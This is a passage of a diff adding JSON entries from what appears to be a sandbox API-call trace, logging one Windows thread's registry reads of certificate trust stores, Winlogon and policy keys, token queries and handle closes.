"NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005c0" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2192 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005d8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\Certificates" + } + ], + "repeated": 0, + "id": 2193 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005d8" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2194 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005d8" + } + ], + "repeated": 0, + "id": 2195 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005d8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CRLs" + } + ], + "repeated": 0, + "id": 2196 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005d8" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2197 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005d8" + } + ], + "repeated": 0, + "id": 2198 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005d8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CTLs" + } + ], + "repeated": 0, + "id": 2199 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005d8" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2200 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005d8" + } + ], + "repeated": 0, + "id": 2201 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2202 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics" + } + ], + "repeated": 0, + "id": 2203 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2204 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" + } + ], + "repeated": 0, + "id": 2205 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e4" + }, + { + "name": "ValueName", + "value": "UserenvDebugLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel" + } + ], + "repeated": 0, + "id": 2206 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74308c1c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e4" + } + ], + "repeated": 0, + "id": 2207 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2208 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\Windows\\System" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\System" + } + ], + "repeated": 0, + "id": 2209 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e4" + }, + { + "name": "ValueName", + "value": "GpSvcDebugLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel" + } + ], + "repeated": 0, + "id": 2210 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74308c7a", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e4" + } + ], + "repeated": 0, + "id": 2211 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2212 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\Setup" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\Setup" + } + ], + "repeated": 0, + "id": 2213 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e4" + }, + { + "name": "ValueName", + "value": "SystemSetupInProgress" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "0" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress" + } + ], + "repeated": 0, + "id": 2214 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74308921", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e4" + } + ], + "repeated": 0, + "id": 2215 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756c7924", + "parentcaller": "0x74308954", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0x000005e0" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x000005e4" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 2216 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005ec" + } + ], + "repeated": 0, + "id": 2217 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e8" + } + ], + "repeated": 0, + "id": 2218 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2219 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e8" + } + ], + "repeated": 0, + "id": 2220 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x000005e8" + } + ], + "repeated": 0, + "id": 2221 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x08\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x1b!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v(\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00$\\xf1[\\x050\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xa0\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xf0\\xf1[\\x05\\xd3!\\xd6\\xfa\\xd4\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xec\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s,\\xf2[\\x05\\x94\\xf4L\\xf2\\xec\\xf1\\xdc\\xf1P\\xf2\\x00\\x00<\\xff\\x00\\x00\\x94\\xf4[\\x05L\\xf2[\\x05P\\xf2[\\x05\\x00\\x00\\x00\\x00\\x00\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00,\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 2222 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e8" + } + ], + "repeated": 0, + "id": 2223 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2224 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005e8" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 2225 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ec" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005e8" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates" + } + ], + "repeated": 0, + "id": 2226 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005e8" + } + ], + "repeated": 0, + "id": 2227 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000560" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\trust" + } + ], + "repeated": 0, + "id": 2228 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005f0" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\Certificates" + } + ], + "repeated": 0, + "id": 2229 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f4" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2230 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005f4" + } + ], + "repeated": 0, + "id": 2231 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005f0" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CRLs" + } + ], + "repeated": 0, + "id": 2232 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f4" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2233 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005f4" + } + ], + "repeated": 0, + "id": 2234 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005f0" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CTLs" + } + ], + "repeated": 0, + "id": 2235 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005f4" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2236 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005f4" + } + ], + "repeated": 0, + "id": 2237 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005f0" + } + ], + "repeated": 0, + "id": 2238 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005fc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\Certificates" + } + ], + "repeated": 0, + "id": 2239 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005fc" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2240 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005fc" + } + ], + "repeated": 0, + "id": 2241 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005fc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CRLs" + } + ], + "repeated": 0, + "id": 2242 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005fc" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2243 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005fc" + } + ], + "repeated": 0, + "id": 2244 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005fc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CTLs" + } + ], + "repeated": 0, + "id": 2245 + }, + { + 